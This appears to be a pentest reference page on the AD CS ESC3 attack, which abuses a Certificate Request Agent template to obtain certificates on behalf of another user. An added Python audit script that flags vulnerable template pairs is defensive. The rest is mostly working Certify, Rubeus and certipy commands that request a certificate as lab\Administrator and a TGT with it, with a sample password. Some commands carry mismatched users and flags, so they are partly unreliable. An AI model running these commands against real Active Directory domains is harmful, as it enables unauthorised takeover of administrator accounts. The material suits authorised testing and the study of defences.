
ESC3

Enumerate

Unlike ESC1 and ESC2, this method requires two certificate templates with the following requirements:

  • First Template
    • Certificate Request Agent EKU
  • Second Template
    • Client Authentication EKU
    • Application Policy Issuance Requirement with Authorized Signatures Required enabled and set to 1

And, of course, a user with enrollment rights.

In the context of ADCS, the Application Policy defines additional constraints that must be met for a certificate to be issued successfully from a template. Having the Authorized Signatures Required attribute set to 1 (or TRUE) means that the certificate issuance process must include authorized signatures to enforce proper authorization and control over the issued certificate.
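
The following audit check is an added example, not part of the original page: given template attributes exported from AD, it flags template pairs that together satisfy the requirements listed above. The `enroll` field, the `LOW_PRIV` set and the sample template names are constructed assumptions, and the check assumes the required application policy on the second template is Certificate Request Agent.

```python
# Added audit sketch: flag template pairs that meet the ESC3 conditions above.
CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"  # Certificate Request Agent EKU
CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"              # Client Authentication EKU
SERVER_AUTH = "1.3.6.1.5.5.7.3.1"              # Server Authentication EKU

# Assumption: principals treated as low-privileged in this lab.
LOW_PRIV = {"LAB\\Domain Users", "NT AUTHORITY\\Authenticated Users"}

def tmpl(name, ekus, ra_sig, ra_policies, enroll):
    """Build one constructed record; 'enroll' is a hypothetical field
    (in AD, enrollment rights live in the template's security descriptor)."""
    return {"name": name, "pKIExtendedKeyUsage": ekus,
            "msPKI-RA-Signature": ra_sig,
            "msPKI-RA-Application-Policies": ra_policies, "enroll": enroll}

# Constructed sample data, not taken from a real environment.
TEMPLATES = [
    tmpl("AgentTemplate", [CERT_REQUEST_AGENT], 0, [], ["LAB\\Domain Users"]),
    tmpl("LogonTemplate", [CLIENT_AUTH], 1, [CERT_REQUEST_AGENT],
         ["LAB\\Domain Users"]),
    tmpl("WebServer", [SERVER_AUTH], 0, [], ["LAB\\Domain Users"]),
    tmpl("AdminAgent", [CERT_REQUEST_AGENT], 0, [], ["LAB\\Domain Admins"]),
]

def low_priv_enroll(t):
    """Low-privileged principals that hold enrollment rights on the template."""
    return sorted(LOW_PRIV & set(t["enroll"]))

def is_agent_template(t):
    """First template: grants the Certificate Request Agent EKU."""
    return CERT_REQUEST_AGENT in t["pKIExtendedKeyUsage"]

def is_on_behalf_target(t):
    """Second template: Client Authentication EKU, one authorized signature
    required, and that signature must carry the agent application policy."""
    return (CLIENT_AUTH in t["pKIExtendedKeyUsage"]
            and t["msPKI-RA-Signature"] == 1
            and CERT_REQUEST_AGENT in t["msPKI-RA-Application-Policies"])

def find_esc3_pairs(templates):
    """Return (agent, target) template names that low-priv users can chain."""
    agents = [t for t in templates if is_agent_template(t) and low_priv_enroll(t)]
    targets = [t for t in templates if is_on_behalf_target(t) and low_priv_enroll(t)]
    return [(a["name"], b["name"]) for a in agents for b in targets]

if __name__ == "__main__":
    for agent, target in find_esc3_pairs(TEMPLATES):
        print(f"Review enrollment rights: agent={agent} target={target}")
```

Restricting enrollment on either template of a reported pair to the intended enrollment agents removes that pair from the output.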

Windows

Requesting a certificate

PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.local.lab\CA-SERVER /template:Template3

Convert Certificate

Request a Certificate on behalf of the Administrator

PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.local.lab\CA-SERVER /template:Template3 /onbehalfof:lab\Administrator /enrollcert:cert.pfx

Convert Certificate

admin.pfx

Request a TGT as the Administrator

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1@local.lab /certificate:admin.pfx /getcredentials

Linux

Requesting a certificate

bobbuilder$ certipy req -ca lab-LAB-DC-CA -template 'Template3' /altname:administrator@local.lab

Requesting a certificate on behalf of the Administrator account

bobbuilder$ certipy req -u 'user1@local.lab' -p 'password1' -ca CA-Server.local.lab -template 'Template3' -on-behalf-of 'lab\administrator' -pfx user1.pfx